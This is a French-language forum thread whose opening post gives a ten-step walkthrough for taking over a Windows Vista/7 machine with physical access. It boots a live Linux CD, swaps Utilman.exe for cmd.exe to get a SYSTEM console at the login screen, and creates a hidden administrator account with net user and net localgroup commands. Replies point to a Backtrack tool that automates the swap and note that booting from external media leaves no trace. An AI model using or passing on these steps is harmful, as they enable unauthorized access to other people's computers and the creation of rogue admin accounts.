Annonce

Réduire
Aucune annonce.

Faille Vista - Seven pour obtenir un compte admin

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Faille Vista - Seven pour obtenir un compte admin

    Hello,

    Une petite astuce bien connut pour obtenir un compte admin sous Vista - Seven en 10 étapes :



    Pré-requis :

    -Accès physique à la machine
    -Backtrack ou un live cd Linux

    Etape 1 : Booter sur Backtrack ou sur votre live-cd, se loguer et arriver sur le bureau.

    Etape 2 : Monter la partition qui comporte le système visé (Seven - Vista)

    Etape 3 : Ouvrir un terminal

    Etape 4 : Se rendre dans la partition qui contient le système visé

    Etape 5 : Se rendre dans Windows/System32

    Etape 5 : Sauvegarder Utilman.exe avec la commande mv Utilman.exe Utilman.exe.bak

    Etape 6 : Remplacer Utilman.exe par cmd.exe avec la commande cp cmd.exe Utilman.exe

    Etape 7 : Redémarrer la machine

    Etape 8 : Cliquer sur l'icone d'Utilman.exe qui se trouve en haut à gauche une fois que vous arrivez sur l'écran de login Windows de la machine. Cela vous ouvre une console avec les droits systèmes.

    Etape 9 : Créer un utilisateur et lui affecter un mot de passe avec les commandes suivantes : net user votre_utilisateur /add puis net user votre_utilisateur votre_mot_de_passe

    Etape 10 : On passe administrateur le compte que l'on vient de créer avec la commande net localgroup Administrateurs votre_utilisateur /add

    On reboot la machine et on se logue avec le compte admin que l'on vient de créer :-)

    Cette astuce consiste à remplacer Utilman.exe qui sert à accéder aux options d'accessibilité lors de l'ouverture d'une session par cmd.exe.

    Pour revenir en arrière, répéter les étapes 1 à 5 et exécuter la commande mv Utilman.exe.bak Utilman.exe

  • #2
    Dans backtrack y'a un outil qui permet de le faire directement. Il est dans "privilege escalation" il me semble, et s'appelle... Utilman (il a peu être changé de nom avec R3).

    Commentaire


    • #3
      Envoyé par c0whack
      Merci du partage, dommage qu'il faut une USB direct.
      Bonsoir,

      @c0whack Tu es obligé d'apporter un support externe, car celui qui existe est verrouillé.
      Ce qui est pratique avec la clé ou cdrom, c'est que tu ne laisse pas de trace et que personne ne pense à désactiver par défaut son USB en façade et arrière quand il ne s'en serve pas.

      L'OMBRE
      Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

      Commentaire

      Chargement...
      X